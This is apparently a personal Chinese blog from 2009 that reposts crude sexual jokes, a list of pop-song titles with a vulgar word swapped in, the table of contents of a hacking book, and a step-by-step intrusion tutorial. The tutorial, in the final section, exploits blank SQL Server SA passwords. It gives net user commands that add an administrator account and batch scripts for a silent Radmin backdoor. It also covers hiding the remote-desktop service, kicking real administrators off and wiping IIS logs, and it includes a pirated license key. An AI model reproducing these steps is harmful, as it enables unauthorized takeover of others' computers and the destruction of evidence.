天

想学自己学

414664728@qq.com(天) — Wed, 16 Sep 2009 09:05:47 GMT

[转]朋友：挺得住算你厉害！！！！看完了没一个能活下的，都笑死了！！！！我的眼泪快出来了....

414664728@qq.com(天) — Wed, 24 Jun 2009 09:12:19 GMT

1
一男子入厕，刚把门关上，就听隔壁问：你来了？
他说：是啊．可心里想，这隔壁是谁啊？我认识他吗？奇怪！
这时隔壁又问：你来干吗啊？
他很生气的说：拉屎啊！来这能干吗？！
隔壁又问，那你什么时候走啊？
他想：这人估计是有神经病！他懊恼的说：拉完就走！！
这时隔壁又问：那一会你来我这里一下吧，好吗？
此人心里一惊：ＣＡＯ！原来是同性恋！
他大骂道：你ＴＭＤ去死吧，变态！
隔壁又说：恩，先挂了吧，一会再给你打过去，我旁边来了个傻Ｂ！老ＴＭＤ跟我接话茬！！
2
一女走夜路,突然看到一男张开双臂向她走来,做拥抱状,上前就是一脚.男子倒地大哭,说:都第三块了,我招谁惹谁了,带块玻璃回家就这么难么?
3

葛优上厕所一次，葛优请朋友吃饭，中途上了趟厕所，回来时，裤子湿了一大块。朋友：你的裤子怎么湿啦？葛优：自从我成名之后经常这样。朋友：经常这样？葛优：可不是！经常是旁边的人撒着尿突然转过来大叫：“ 这不是葛优吗！”
4
幸运52发生的真实笑话,李咏都笑趴下了! PART1: 一对夫妻，猜食品名称，老婆比划老公猜。大屏幕上跳出"馒头"一词老婆描述：圆圆的，白白的，能吃的老公：………… 老婆继续描述：就是白白的，软软的，你昨晚上还吃来着！老公看来是急坏了，脱口而出："mimi！" 李咏都笑趴下了。。。。。
5
要钱一次乘公交车回家，上车后发现钱包里没有一元零钞，一着急，便掏出一张十元大票进投币口。后来越想越觉得窝囊，便跟司机商量，能不能让我守在门口，将下一站乘客本应投进投币口的钱据为己有？司机同意了。　　车很快驶到下一站，很多人争着上车。我挡在门口，对第一位乘客说：“把钱给我。”对方一愣：“凭啥？”三言两语也解释不请，我就说：“给我就行了，别的不用管。”对方瞅瞅司机，司机点头默许。于是，一元钱到手。依法炮制，很快收了八个一元钱。接着上来一位大汉，虎背熊腰，剃着板寸，露着刺青。见我拦着他，怒道：“干吗呢?哥们儿？”我说：“一会儿再跟你说，先把钱给我。”对方眼珠子都圆了：“说啥呢？”我说：“把钱给我！”对方张大了嘴，冲司机问：“这小子干吗的？”大汉堵在门口，后面的人上不来，而车厢里的人急着发车，所以大家七嘴八舌地嚷起来了：“啰唆什么呢！快给钱！”大汉很快瘪了下去。只见他从口袋里掏出钱包递过来，哭丧着脸说：“老大，身上就这点钱，你们人多，我服了.
6
今天下午和一群女同事聊天，突然有人说我不是男人　　我火了，我说，你说我不是，我掏出来给你看　　女生都笑了，有一个最牛，说，你掏啊~~~~~~~~~~ 　　我就把身份证掏出来了
7 看完了没一个能活下的，都笑死了今天是我的生日，女友早早的打来电话说晚上要到家里去为我祝贺生日，还要带给我惊喜！听了这个好消息！我今天工作起来是格外买力，一下跑了十几个客户！回到公司。都下午三点了，到食堂一看，只剩下可怜巴巴的一菜一汤了，肉炒三豆（肉炒黄豆、青豆、豌豆）和萝卜汤。没办法，跑了一上午客户，肚子早就咕咕的叫了，只好要了一大盘肉炒三豆和一大盆萝卜汤，吃了起来！没想到临下班了，我的肚子里就像一台越野吉普的发动机！--开始了剧烈的活塞运动！刹那间，一股股气体来势争先恐后的从我的体内冲了出来！我赶紧冲到没人的地方，肚子开始还是不好意思的轻声吟唱，但马上就变成了连珠炮似的噗噗做响！肚子好涨呀！而正在这时，女友却打来电话，说她已经到家了，叫我赶紧回家。唉！没办法只好回家去了，希望她不会看见我这幅狼狈样呀！…… 在回家的路上我刻意努力的放了很多的屁。快到家了，肚子好受了很多，我觉得应该不会再出什么问题了。远远就看到了在门边等着我的女友，她看起来有点兴奋。她大叫着说，“亲爱的，今晚，我为你准备了一份非常奇妙的、一定会让你大吃一惊的礼物。” 还没进门，女友就用一块布把我的眼睛紧紧蒙了起来，说是要给我一个惊喜！还领着我坐到位于餐桌前头的椅子里，并且让我发誓不会偷看。突然，我感到又想放屁了。恰恰就在这时，女友的手机响了。这可救了我的命了！我找借口说嫌乱让她到另一间屋子里去接电话！她却非让我不能揭开蒙着眼睛的布，还让我发誓！之后才跑去另一间屋子里接电话。她一离开，我就抓紧时机，把全身的重量都移到一条腿上，把屁放了出来。这个屁放得不仅声音很大，而且气味就象是腐臭的鸡蛋散发出的臭味。我几乎不能呼吸，因此我摸到椅垫，使劲的向四周扇着，妄图扇掉这难闻的气味。就在我刚感觉好一点的时候，另一个屁又来了。我又抬起腿开始放！它听起来就象是柴油发动机快速转动的声音，而且这一次气味更难闻了。为了不让自己窒息，我用胳膊挥舞着椅垫扇了起来，希望气味会尽快散掉。又是在一切将要恢复正常的时候，另一个屁又迫不及待的冲来了。于是我站起来，弯下腰，把屁股向后上方撅了起来！把它放了出来。这个屁放得真正称得上是一流，连身后的报纸都被吹散到了地下.......... 我侧耳倾听另一间屋子里女友交谈的声音，因为要遵守不偷看的诺言，我也不敢打开眼罩，只能在漆黑中不断放着屁，为了赶快把肚子中的气体全部排出，又不使屋里变得更臭！我解开了裤腰带，把内裤和长裤褪到了小腹以下，把屁股露了出来，并摸索着打开了身后阳台的门，几乎是将整个屁股都伸到阳台上，开始疯狂的放起屁来……，啊！好受多了！之后，我又手舞足蹈的用椅垫满屋乱扇，祈祷这股恶臭能赶快散去……，就这样，在接下来的十几分钟以内，我一边不断的放着屁，一边不断的扇着椅垫，终于，当我听到她在电话里说再见的时候，屋里的空气和我的肚子都已经好多了！我迅速的系上裤子，整理了一下头发，开始优雅地、微笑着等着我亲爱的她来带给我惊喜。当她走近的时候，我脸上带着满足地微笑，一付温存的样子。女友首先为她打了这么长时间的电话向我道了歉，然后问我有没有偷偷掀开过布。在我向她保证没有偷看之后，女友移走了遮在我眼睛上的布，并对我说道，“意外吧！我的女友今天非让我带她们来看看你，她们说你在照片上很有风度，人长的很帅！喏！你看，坐在桌前的这五位都是我单位里的好姐妹，而站在阳台上的那六位是我上学时最要好的朋友！” 这时，我才极为震惊和恐惧的发现，有一大堆女孩正围坐在我对面的餐桌边，而身后的阳台上则站着另一堆，她们都是来参加这个令我感到非常意外的生日宴会的。现在，她们每个人脸上都带着一种无法言表的表情看着我，就像发现了火星人………………
8
一只嘴谗的小狗又跳上餐桌找寻食物,发现一只烤鸡,正欲吃时,主人突然大叫:如果你敢对那只鸡怎么样,我就对你怎么样!于是小狗舔了下鸡屁股
9
我们单位的女同事昨天坐公车去银行，车上有一个穿的很艳的年青女子。有一色狼就过去了，站在她的身后，来回和她进行身体接触。女子大怒，回头破口大骂：你挤个J8啊！！这个时候车内安静了，经过几秒钟的沉闷，那个色男子回答到：1个J8 当时车内暴笑。我们同事说，本来有几个男孩本想过去帮那女孩忙的，但也都乐的不行了，后来一到站那个色狼就下车了
10
一次逛街时突然觉得肚子很痛，于是走进街角的199吃到饱火锅店，想说借个厕所用用，偏偏找遍了一楼就是找不到，于是我跑到二楼去，二楼是还在装修空荡荡的没有任何东西，但是却发现有一间厕所门贴着*故障待修,请勿使用*，我实在是忍不住了,管他三七二十一，反正四下无人，脱了裤子就朝马桶蹲下去，霹雳啪啦……好爽！！结束后，我走下楼去却发现空无一人，奇怪了，正值晚餐时间刚才楼下还高朋满座说,怎么一下子就人去楼空呢？？连服务生和接待都不见了……于是我走近吧台，并且问到：「有人在吗？怎么都没人了？」此时，只见一个男服务生从吧台下钻出来，并且开口说：「*！……刚才大便从天花板掉下来打到电风扇的时候你不在？算你运气好
11

逃犯从被关押十五年的监狱逃跑了。他闯入了一个民宅寻找食物和钱，却发现一对年轻夫妻在床上。于是，他命令丈夫下床，并且把他捆绑在椅子上。然后他又将妻子捆绑在床上，并长长地吻了她的脖子，然后走进了厕所。当逃犯在厕所的时候，丈夫对妻子说：“听着，这人一定是逃犯，只要看他的衣服就知道。他一定在监狱的时间太久，好多年都没有见过女人，从他亲吻你脖子的样子就看得出来。如果他要和你上床，千万不要抵抗，不要抱怨，按他说的去做，不管他如何蹂躏你，都要满足他的要求。他一定非常危险，如果他发怒的话，可能会将我们都杀了。你一定要挺住，宝贝，我爱你。” 妻子说：“他并没有亲吻我的脖子，而是在我耳边轻声说话。他告诉我他是同性恋，而且他觉得你很可爱，还问我家里有没有凡士林。我告诉他在厕所里。你一定要挺住，宝贝，我也爱你 ...
12
某偏远山区，一女人生性水性扬花，婚后不久，其男人外出做生意，女人在屋中与情夫偷情。事到一半，听屋外脚步传来，女人慌忙让情夫穿上羊皮大衣躲到后院羊圈里。　　其男人回来拉过女人欲行房事，女人拒绝，男人饥渴难耐便到后院抓了一只羊，碰巧这羊就是女人情夫假扮的，一翻云雨过后，男人满足回房，半夜起来又去抓羊发泄一翻。　　早晨，男人起床，回想昨晚，觉得羊别有一翻滋味，便又去后院，把羊抓住正准备行事，羊突然站起来说话了：“你他妈是不是疯了，羊圈里就我一个羊吗？”
13
高中时候，班里一哥们，1981年生，不大，就是特老相..... 以下是他坐公交时发生的一点事情：高二时候，这哥们座公交去学校，因为路途长，百无聊赖的时候，邻座的一个35岁左右的男人跟他搭话，那人张嘴就来句：“大哥，去哪里？这哥们也许是平常遭遇这样的待遇多了，也并不万分惊奇，颇平静的回答：“三中”。那男人第二句话：“噢，去看孩子吧？孩子上学挺苦的......” 那哥们脸部抽搐了一下，没吭声。第三句话：“大哥，你孩子上几年纪了？”那哥们是真烦了，也不解释，顺口来了句：“高一” 这个时候，经典出现了。那男人异常惊奇地瞪大眼睛看着那哥们，看了足足十秒钟，来了句:“大哥，那您结婚可是挺晚的啊！”

看谁有我猛…想了两小时实在想不出来了！

414664728@qq.com(天) — Thu, 18 Jun 2009 18:05:00 GMT

PS：208楼的我日你全家雌性人动物，不喜欢这种的请绕道，别TMD骂我，我本来想在帖子标题上加“把爱改成日的”但标题不可以那么长，所以我没办法写出来，所以麻烦看见认为不喜欢的请换帖，别TMD骂，既然不喜欢就不需要看完，更不需要看完来说我不对
姜育恒《日我你怕了吗》

陶喆《日我还是他》——“你日我还是他...”

王力宏《日你等于日自己》——“日你就等于日自己...”

张信哲《日就一个字》——“日就一个字，我只说一次”

潘玮柏《不得不日》——“天天都需要你日...”

刘德华《日你一万年》——“日你一万年，日你经得起考验”

邰正宵《千纸鹤》——“日太深，容易看见伤痕”

吴克群《日太痛》——“能不能不日了，因为日太痛了，我痛得快死了...”

林依晨《非你莫属》——“日我，非你莫属...”

古巨基《日的太晚》

Angela《能不能勇敢说日》

林俊杰《简简单单》——“只是简简单单的日过，我还是我”

苏永康《日一个人好难》

赵传《日要怎么说出口》

裘海正《日你的人和我日的人》

郑源《难道日一个人真的有错吗》

钟汉良《亲热》——“我日上你，一定日到底...”

胡杨林《香水有毒》——“我曾经日过这样一个男人...”

黑龙《我日你你却日着他》——“我日你你却日着他...”

s**《日我中华》——“日我中华...”

陈明《等你日我》——“等你日我，哪怕只有一次也就足够...”

陈慧琳《记事本》——“日的痛了，痛的哭了…”

张震岳《日我别走》——“日我别走，如果你说，你不日我…”

苏永康《为什么你背着我日别人》

苏永康《日一个人，好难》

周杰伦&温岚《屋顶》——“在屋顶和我日的人”

Twins《我很想日他》

林峰《日不疚》——“其实我绝非日得不够”

周笔畅《日好难》——“为什么，日好难，为何日不能简简单单”

卢学睿《日我的两个人》——“日我的两个人都那么认真那么纯”

黑糖玛奇朵《苦茶》——“不用等你开口先说我日你”

王力宏《Forever love》——“日你,不是因为你的美...”

梁静茹《其实爱很简单》——“一直在‘日’你...”

刘力扬&炎亚纶《Tiamo》——“我每天都要日上你...”

吴克群《越日越难过》——“你越日越难过”

周董《给我一首歌的时间》——“我说我不该，不该在这时候才说日你”

罗志祥《一枝独秀》——“日日日日，准备大显身手”

刘若英《为日痴狂》——“像我这样为日痴狂”

BY2《好好日》——“能不能好好日我，手牵手，一起走”

戴佩妮《日疯了》——“日疯了我疯到自己痛也不晓得”

S.H.E《说你日我》——“说你日我，变成一种问候”

五月天《为日而生》——“只因我为日生，只因为我为日而生...”

黑Girl《女生》——“我是女生，只要日一个人就尽全力去争...”

梁静茹《勇气》——“日真的需要勇气，来面对流言蜚语...”

品冠《请你相信我》——“请你相信我，日你是真的...”

古巨基《日的太迟》——“最心痛是，日得太迟...”

张韶涵《能不能勇敢说爱》——“可是你却迟迟不说日我...”

卓文萱《一句话》——“你日我太美好，时间会知道...”

元若蓝《99次我日他》——“99次我日他...”

王心凌《爱的天灵灵》——“日的天灵灵，日的地灵灵”

蔡依林《倒带》——“终于看开日回不来，我们面前太多阻碍”

范晓萱《氧气》——“如果你日我，你会来救我”

S.H.E《安静了》——“爱我还是爱你，你选择了自己”

林俊杰阿Sa《小酒窝》——“我永远日你到老...”

吴克群《大舌头》——“说说说说说你日我，我我我我说不出口...”

奋萧敬《腾不顾身》——“我用我的生命日你...”

周杰伦《发如雪》——“日在月光下完美...”

阿沁&李玖哲《记得日》——“记得日，所有幸福的片段...”

卓文萱《幸福氧气》——“我日你，就是你，给我幸福的氧气”

张栋梁《小乌龟》——“日的感觉，比樱桃更甜”

李玟《baby 对不起》——“日的天气总是阴晴不定”

李玖哲《我会好好过》——“我会好好过,等你再日我...”

S.H.E《日来过》——“我就是要等你回來日我...”

F.I.R.《需要你的日》——“我需要你的日...”

光良《不会分离》——“我日你，不言语，这一刻天在哭泣...”

张韶涵《爱上日的味道》——“爱上日的味道，让我脸红心跳”

飞轮海《夏雪》——“你给的日带着温度，尤其拥抱时最清楚”

林宇中《远远》——“我不配，你的美，竟把你日得狼狈”

曾沛慈《傻瓜》——“日得没那么做作”

刘力扬&林宥嘉《传说》——“如果我们那时就相遇，会不会日得比较放心”

许茹芸&阿穆隆《男人女人》——“日日日日了几回，也明白几种滋味...”

金莎《大小姐》——“不过这不代表我会日你多一些”

S.H.E《月光手札》——“日不日我你都懒得回答”

李小璐《爱你爱的无可救药》——“日你日的无可救药，恨你恨得备受煎熬”

张宇《爱情条约》——“日可以不费吹灰...”

莫文尉《他不日我》——“他不日我，牵手的时候不认真...”

莫文蔚《日死你》——“日死你...”

蔡旻佑《我可以》——“在你的背景，有我日你...”

徐誉腾《等一分钟》——“你会不会，至今停在。说日我的那天...”

周杰伦《黑色毛衣》——“再说我日你，可能雨也不会停”

南拳妈妈《下雨天》——“被日的人不用道歉”

李玖哲《想太多》——“太晚我才懂，日了你太多”

柯有纶《日，不日》——“日不日，我活该...”

林宥嘉《伯乐》——“日你的那一刻，想你的那一刻”

黑客攻防秘技大曝光

414664728@qq.com(天) — Tue, 26 May 2009 08:42:53 GMT

　
本书是为了使广大读者了解黑客的攻击手法并知道如何进行相应的防范而编写的，实用性强。全书共分为11章，通过在虚拟实验环境中进行技能训练的方式，详细讲解黑客实验环境的打造，剖析漏洞和木马的危害，并对攻击即时通信软件(QQ／MSN)／电子邮箱的手法进行揭秘和演示，及指出相应的防范措施。本书对时下流行的针对沦坛／文章系统／博客系统的攻击、跨站攻击、注入攻击实例进行讲解，还通过黑客攻击与防范、电脑软件加密解密、远程溢出攻击实例讲解了电脑朋艮务器的安全防护。.

　　本书内容丰富，深入浅出，图文并茂，可供对网络安全及对黑客攻防感兴趣的读者使用，同时可作为一本速查手册，供网络安全从业人员及网络管理员使用。

编辑推荐　　随着互联网的迅猛发展，一些“信息垃圾”、“邮件炸弹”、“病毒木马”、“网上黑客”等越来越多地威胁着网络的安全。本书紧密围绕黑客的攻与防来展开介绍，全书的主线就是围绕黑客的“攻与防”，告诉读者如何建立个人电脑的安全防护措施，从而使自己远离黑客攻击的困扰，确保自己电脑数据的安全。本书在围绕“攻与防”来展开叙述的同时，特别注重实际例子的演示作用，针对每一种攻防手段，都结合实际的例子来进行介绍，以期使读者能够对这些黑客的攻防技术有更加感性的认识。作者采用最为通俗易懂的图文解说，即使您是电脑新手，也能通读全书；任务驱动式的黑客软件讲解，揭秘出每一种黑客攻击的手法；对最新黑客技术的盘点，让您能够实现“先下手为强”；使用攻防互渗的防御方法，可以全面确保您的网络安全。

　　本书是为了使广大读者了解黑客的攻击手法并知道如何进行相应的防范而编写的，实用性强。全书共分为11章，通过存虚拟实验环境中进行技能训练的方式，详细讲解黑客实验环境的打造，剖析漏洞和木马的危害，并对攻击即时通信软件(QQ／MSN)／电子邮箱的手法进行揭秘和演示，及指出相应的防范措施。本书对时下流行的针对论坛／文章系统／博客系统的攻击、跨站攻击、注入攻击实例进行讲解，还通过黑客攻击与防范、电脑软件加密解密、远程溢出攻击实例讲解了电脑／服务器的安全防护。

　　本书内容丰富，深入浅出，图文并茂，可供对网络安全及对黑客攻防感兴趣的读者使用，同时可作为一本速查手册，供网络安全从业人员及网络管理员使用。

[编辑本段]
目录　　第1章实战黑客新手的入侵与防御

　　1.1 黑客新手的入侵与防御.

　　1.1.1 新手热衷入侵的缘由

　　1.1.2 黑客是如何入侵的

　　1.1.3 查看自己开放的端口

　　1.1.4 使用系统自带命令查看自己的IP信息

　　1.1.5 利用软件查看自己的IP信息

　　1.1.6 扫描某网段内的所有端口

　　1.2 新手入侵与防御实战

　　1.2.1 Windows XP的syskey命令

　　1.2.2 通过百度查看收藏夹

　　1.2.3 黑客预防的具体方案

　　1.3 可能出现的问题与解决方法

　　1.4 总结与经验积累

　　第2章黑客的常用工具

　　2.1 目标搜索工具的使用

　　2.1.1 端口扫描工具SuperScan

　　2.1.2 多线程扫描工具X-Scan

　　2.2 目标入侵工具的使用

　　2.2.1 SQL主机的SA弱口令及扫描软件ScanSQL和SQLTools

　　2.2.2 Windows NT／ 00自动攻击探测机

　　2.3 扩大入侵工具的使用

　　2.3.1 便捷易用的嗅探器Iris

　　2.3.2 黑客为自己留下一道后门

　　2.4 可能出现的问题与解决方法

　　2.5 总结与经验积累

　　第3章代理与日忑的清除

　　3.1 跳板与代理服务器

　　3.1.1 代理服务器概述

　　3.1.2 跳板概述

　　3.1.3 代理服务器的设置

　　3.1.4 制作自己的一级跳板

　　3.2 代理工具的使用

　　3.2.1 代理软件CCProxy中的漏洞

　　3.2.2 代理猎手使用技巧

　　3.2.3 代理跳板建立全攻略

　　3.2.4 利用SocksCap32设置动态代理

　　3.2.5 用MultiProxy自动设置代理

　　3.3 黑客如何巧妙清除日志文件

　　3.3.1 利用elsave清除日志

　　3.3.2 手工清除服务器日志

　　3.3.3 用清理工具清除日志

　　3.4 恶意进程的追踪与清除

　　3.4.1 理解进程和线程

　　3.4.2 查看.关闭和重建进程

　　3.4.3 隐藏进程和远程进程

　　3.4.4 杀死自己机器中的病毒进程

　　3.5 可能出现的问题与解决方法

　　3.6 总结与经验积累

　　第4章如影随形的远程监控

　　4.1 修改注册表实现远程监控

　　4.1.1 通过注册表开启终端服务

　　4.1.2 Telnet中的NTLM权限验证

　　4.2 端口监控与远程信息监控

　　4.2.1 监控端口的利器Port Reporter

　　4.2.2 用URLy Warning实现远程信息监控

　　4.2.3 用SuperScan实现端口监控

　　4.3 几款实现远程控制技术的软件实际体验

　　4.3.1 用CuteFTP实现上传和下载

　　4.3.2 通过WinVNC体验远程控制

　　4.3.3 用WinShell自己定制远程服务端

　　4.3.4 进行多点控制的利器QuickIP

　　4.3.5 定时抓屏的好帮手——屏幕间谍

　　4.3.6 用魔法控制2005实现远程控制

　　4.4 远程控制的好帮手pcAnywhere

　　4.4.1 安装pcAnywhere程序

　　4.4.2 设置pcAnywhere的性能

　　4.4.3 用pcAnywhere进行远程控制

　　4.5 可能出现的问题与解决方法

　　4.6 总结与经验积累

　　第5章给QQ和MSN用户提个醒

　　5.1 你的QQ密码是否被窃取过

　　5.1.1 简便易用的QQ枪手

　　5.1.2 QQ远控精灵

　　5.1.3 QQ万能发送精灵

　　5.1.4 QQ破密使者和QQ密码使者

　　5.1.5 注视QQ密码的黑眼睛

　　5.1.6 在线窃号的QQExplorer

　　5.1.7 QQ机器人

　　5.2 用“防盗专家”为QQ保驾护航

　　5.2.1 全面认识防盗专家

　　5.2.2 关闭广告和取回QQ密码

　　5.2.3 内核修改和病毒查杀

　　5.2.4 用无敌外挂实现QQ防盗

　　5.3 狙击QQ消息炸弹

　　5.3.1 QQ狙击手

　　5.3.2 通过对话模式发送消息炸弹

　　5.3.3 依据IP地址和端口号进行轰炸

　　5.3.4 防御QQ消息炸弹

　　5.4 打造一个安全的QQ环境

　　5.4.1 识破伪装“QQ密码保护”的骗局

　　5.4.2 全面武装打造安全QQ

　　5.4.3 利用工具杀除QQ病毒

　　5.5 给喜欢用MSN的用户提个醒

　　5.5.1 MsncMessenger Hack工具的使用

　　5.5.2 用MessenPass查看本地密码

　　5.6 可能出现的问题与解决方法

　　5.7 总结与经验积累

　　第6章电子邮件攻防实战

　　6.1 WebMail邮件攻防实战..

　　6.1.1 来自邮件地址的欺骗

　　6.1.2 WebMail邮箱的探测

　　6.1.3 如何探测E-mail密码

　　6.1.4 针对POP3邮箱的“流光”

　　6.1.5 邮箱被占后如何恢复邮箱密码

　　6.2 全面认识邮箱炸弹

　　6.2.1 邮箱炸弹

　　6.2.2 其他方式的邮箱轰炸

　　6.2.3 什么是邮件木马

　　6.2.4 溯雪使用详解

　　6.2.5 防范邮件炸弹

　　6.3 全面防范邮件附件病毒

　　6.3.1 禁止HTML格式邮件的显示

　　6.3.2 尽量不保存和打开邮件附件

　　6.3.3 启用Outlook Express加载项(插件)

　　6.3.4 修改文件的关联性

　　6.4 网页木马揭秘

　　6.4.1 检查计算机能否响应invokeverb函数调用

　　6.4.2 将木马服务器下载到访客计算机中的途径

　　6.4.3 编写可以启动木马服务器的JavaScript文件

　　6.4.4 黑客编写实际的HTML恶意网页

　　6.4.5 解决方案

　　6.5 可能出现的问题与解决方法

　　6.6 总结与经验积累

　　第7章木马和间谍软件攻防实战

　　7.1 捆绑木马和反弹端口木马

　　7.1.1 什么是木马

　　7.1.2 轻松制作捆绑木马

　　7.1.3 黑洞2005企业版

　　7.1.4 极易上当的WinRAR捆绑木马

　　7.1.5 用“网络精灵”木马(netspy)实现远程监控

　　7.1.6 初识反弹端口木马——“网络神偷”

　　7.2 反弹型木马的经典——灰鸽子

　　7.2.1 生成木马的服务端

　　7.2.2 木马服务端的加壳保护

　　7.2.3 把木马植入他人的电脑中

　　7.2.4 小心别被对方远程控制

　　7.2.5 灰鸽子的手工清除

　　7.3 全面防范网络蠕虫

　　7.3.1 网络蠕虫概述

　　7.3.2 网络蠕虫病毒实例分析

　　7.3.3 网络蠕虫病毒的全面防范,142

　　7.4 自动安装“后门程序”的间谍软件

　　7.4.1 什么是间谍软件

　　7.4.2 如何拒绝潜藏的间谍软件

　　7.4.3 用Spybot揪出隐藏的间谍

　　7.4.4 间谍广告的杀手Ad-aware

　　7.4.5 对潜藏的“间谍”学会说“不”

　　7.5 来自微软的反间谍专家

　　7.5.1 初识反间谍软件Microsoft AntiSpyware

　　7.5.2 手动扫描查杀间谍软件

　　7.5.3 设置定时自动扫描

　　7.5.4 开启对间谍软件的实时监控

　　7.5.5 附带的特色安全工具

　　7.6 可能出现的问题与解决方法

　　7.7 总结与经验积累

　　第8章扫描.嗅探和欺骗

　　8.1 扫描与反扫描工具精粹

　　8.1.1 用MBSA检测Windows系统是否安全

　　8.1.2 深入浅出RPC漏洞扫描

　　8.1.3 个人服务器漏洞扫描的WebDAVScan

　　8.1.4 用网页安全扫描器查看你的网页是否安全

　　8.1.5 防御扫描器追踪的ProtectX

　　8.1.6 网页信息收集器

　　8.2 几款经典的网络嗅探器

　　8.2.1 用嗅探器Sniffer Pro捕获数据

　　8.2.2 用嗅探器SpyNet Sniffer播放音乐或视频

　　8.2.3 能够捕获网页内容的艾菲网页侦探

　　8.2.4 局域网中的嗅探精灵Iris

　　8.3 网络上的欺骗与陷阱

　　8.3.1 具备诱捕功能的蜜罐

　　8.3.2 拒绝恶意接入的网络执法官

　　8.4 可能出现的问题与解决方法

　　8.5 总结与经验积累

　　第9章全面提升自己的网络功能

　　9.1 全面提升自己的网页下载权限

　　9.1.1 顺利下载被加密的网页

　　9.1.2 并不安全的右键锁定

　　9.1.3 应对禁用“复制／保存”功能

　　9.1.4 还原被加密的网页源码

　　9.1.5 如何有效预防网页被破解

　　9.2 使自己下载文件的权力更大

　　9.2.1 使用SWF文件实现顺利下载

　　9.2.2 利用“网络骆驼”突破下载限制

　　9.2.3 利用“图片猎人”顺利下载图片

　　9.2.4 共享和隐藏共享的文件夹

　　9.2.5 如何下载有限制的影音文件

　　9.3 在网吧中一样可以实现下载

　　9.4 拒绝网络广告

　　9.4.1 过滤弹出式广告的傲游Maxthon

　　9.4.2 网络广告杀手Ad Killer

　　9.4.3 广告智能拦截的利器Zero Popup

　　9.4.4 使用MSN的MSN Toolbar阻止弹出广告

　　9.5 可能出现的问题与解决方法

　　9.6 总结与经验积累

　　第10章黑客入侵防御实例详解

　　10.1 病毒入侵之最——冰河2005

　　10.1.1 配置冰河木马的被控端

　　10.1.2 搜索.远控目标计算机

　　10.1.3 冰河软件的使用流程

　　10.1.4 卸载和清除冰河木马

　　10.2 黑客的掌上明珠：SSS

　　10.3 当代的千里眼——流萤2.3

　　10.3.1 配置服务端

　　10.3.2 监听主机

　　10.3.3 接入控制

　　10.3.4 服务端的卸载

　　10.4 运用SQL注入解密电影网站

　　10.5 急需设防的139端口

　　10.6 可能出现的问题与解决方法

　　10.7 总结与经验积累,211

　　第11章打好网络安全防御战

　　11.1 建立系统漏洞防御体系

　　11.1.1 检测系统是否存在可疑漏洞

　　11.1.2 如何修补系统漏洞

　　11.1.3 监视系统的操作进程

　　11.1.4 抵抗漏洞的防御策略

　　11.1.5 防火墙安装应用实例

　　11.2 使用硬盘数据恢复

　　11.2.1 什么是数据恢复

　　11.2.2 造成数据丢失的原因

　　11.2.3 使用和维护硬盘的注意事项

　　11.2.4 数据恢复工具Easy Recovery和Final Data

　　11.3 杀毒软件使用实战

　　11.3.1 瑞星杀毒软件使用实战

　　11.3.2 江民杀毒软件使用实战

　　11.3.3 金山毒霸2006使用实战

　　11.3.4 东方卫士2006使用实战

　　11.4 可能出现的问题与解决方法

　　11.5 总结与经验积累

入侵电脑

414664728@qq.com(天) — Tue, 26 May 2009 03:06:43 GMT

SA空口令入侵到3389终结完整编(转) SA空口令入侵到3389终结完整编作者：fibwet 来源：原创更新时间：2006-5-2 浏览次数：40 工具:WINNTAutoAttack自动攻击器(扫漏洞) SQLTOOLS(SA空口令连接器) RAMDIN影子3.0中文版(远程控制程序) RADMIN注册码: 08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23 SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序) CleanIISLog.exe(小榕的擦PP程序) 3389.exe(开3389端口服务的) psu.exe(使用被禁止的Guest帐户要用到的) mstsc.exe(远程桌面连接程序) 下载(点右键用下载工具下) 一.扫到SA弱口令..(自动攻击器) 二.用SQLTOOLS连上去建一个用户 net start telnet 开telnet服务 net user mint mint /add 添加用户mint密码为mint net localgroup administrators mint /add 将帐号mint升级为管理员三.上传后门程序RAD.EXE(RADMIN服务端自解压程序) 制作RAD.EXE过程: 1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe(从新 2、在本地设置服务端（一定要生成）设置密码-->>设置连接端口(默认4489)-->>生成 3、导出注册表HKEY_LOCAL_MACHINE\SYSTEM\Radmin的键值为1.reg 4、编写一个批处理，并命名为u.bat -------------------------------------------- @echo off net stop r_server -------------------------------------------- 5、写第二个批处理，r.bat,内容为 -------------------------------------------- @echo off @Explorer.exe /uninstall /silence @Explorer.exe /install /silence @regedit /s 1.reg @echo off @Explorer.exe /uninstall /silence @Explorer.exe /install /silence @regedit /s 1.reg @net start r_server @del rad.exe @del 1.reg @del r.bat @del u.bat -------------------------------------------- 6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包 7、将Rad.rar制作成自解压文件. 选择Default.sfx的自释放模块-->>高级自释放选项 -->>常规释放路径:%systemroot%\system32 安装程序:释放后运行:r.bat 释放前运行u.bat -->>摸式缄默模式:全部隐藏覆盖方式:覆盖所有文件 -->>确定-->>确定生成完成四.用RADMIN客服端连接.... 上传文件到c:\WINNT(XP是windows): port.bat(如果是在XP下..这个要把里面的WINNT改为Windows) query.exe quser.exe SC.exe CleanIISLog.exe.exe 3389.exe psu.exe 最好再上传一个反弹后门 RADMIN进入TELNET 运行 c:\winnt\3389.exe 重启肉鸡五.重启后用远程桌面远程器连上去这里就有时会出现个问题.. 使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。 telnet对方ip。发现需要NTLM 身份验证。我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint telnet对方ip.直接可以登陆对方电脑了。使用命令 c:\query user (查看对方目前终端登陆状况。) 运行命令 c:\logoff 1(踢出去一个管理者) 再用c:\query user检查一便~~(这就是为什么不马上用1.bat了) 六.连上后..在cmd下运行 c:\winnt\log . 自己的IP .(擦PP) c:\winnet\1.bat (删除覆盖查看当前在线用户文件) 作者： 125.90.34.* 2006-7-14 23:30 回复此发言 -------------------------------------------------------------------------------- 2 SA空口令入侵到3389终结完整编七.打SA空口令补丁程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的) -->>Windowst身位验证登陆复制一下代码:SELMIS -------------------------------------------- if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1) exec sp_dropextendedproc N'[dbo].[xp_cmdshell]' GO -------------------------------------------- 按F5(运行) 